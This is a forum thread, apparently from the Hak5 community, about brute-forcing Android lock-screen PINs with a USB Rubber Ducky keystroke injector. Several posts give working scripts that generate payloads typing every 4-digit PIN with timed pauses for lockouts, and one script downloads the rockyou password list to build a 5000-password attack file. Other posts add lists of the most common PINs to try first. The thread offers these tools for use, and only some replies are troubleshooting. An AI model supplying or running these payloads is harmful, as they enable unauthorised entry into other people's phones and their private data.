30 replies to this topic

[Darren Kitchen]

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.



I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

[Pwnd2Pwnr]

Darren Kitchen... once again... kicks ass and is like, "Whatevs".

Keep on rockin @Darren!

[Mr-Protocol]

I sent you a message elsewhere, but figured it would fit here as well.

Does this require ADB to be enabled?

[Darren Kitchen]

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

[Mr-Protocol]

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev teensy, I was one of the lucky ones.) next week when I get paid... along with other hakshop goodies .

[silver-moonshine]

would this not also be effective on the new windows 8 , when people have the option to change their signin password with a pin ?

[shoeless89]

I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot!

[overwraith]

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>

Edited by overwraith, 09 December 2012 - 03:41 PM.

[shoeless89]

So when I plug the Rubber Ducky into my phone is doesn't do anything at all. The light doesn't light up or anything. But When I plug it into my computer I see the inject.bin file and the led's on the duck lights up. Any ideas?

[Xcellerator]

Are you sure that your phone supports a USB keyboard?

[midnitesnake]

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed

then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

Not sure whats going wrong with cygwin?

[keb0x80]

I created a script to generate pretty much the same output using only bash loops/conditions

#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
    do
	  echo "DELAY 5000"
	  echo "ENTER"
    done
  fi
done

[shoeless89]

Are you sure that your phone supports a USB keyboard?

No I am not ;/

[Totu]

You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.
Most common PINs would be any combinations with all same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try thous first then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't wan't to remember more than two numbers.

Just my two cents.

[Kag]

It is kind of odd they didn't lock down the device after a certain number of tries as pattern lock does that after 20 tries.
And once it gets locked down you'll need your gmail password to unlock. (Which also sort of fails as well cause reboot resets the counter)

Edited by Kag, 13 December 2012 - 08:48 AM.

[iamnoxtras]

Hello everybody,
I must say that I am surprised that noone (only Totu) suggested to use a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to bruteforce your way into a device with PIN you should really use that list, instead of a generated one.
Here is the study?
http://www.datagenet...september32012/

and here are the first 10 pins I would try:
1234
1111
0000
1212
7777
1004
2000
4444
2222
6969

1 in 4 chance of hacking the device in under a minute!
What do you say?

Edited by iamnoxtras, 13 December 2012 - 09:35 AM.

[Pwnd2Pwnr]

My password is....

1

2

4

4

5

The same one on my luggage...

[overwraith]

I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the CYGWIN bin directory in my path variable. Have to use the CYGWIN prompt provided with their software.

[CaptainHooligan]

Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.

** Edit **
Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.

#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
	 echo "Sorry, you need super user access to run this script."
	 exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
else
echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
else
echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
else
echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
PATH=$PATH:$wgetdir
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin

Edited by CaptainHooligan, 14 December 2012 - 05:27 PM.

[barry99705]

My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number...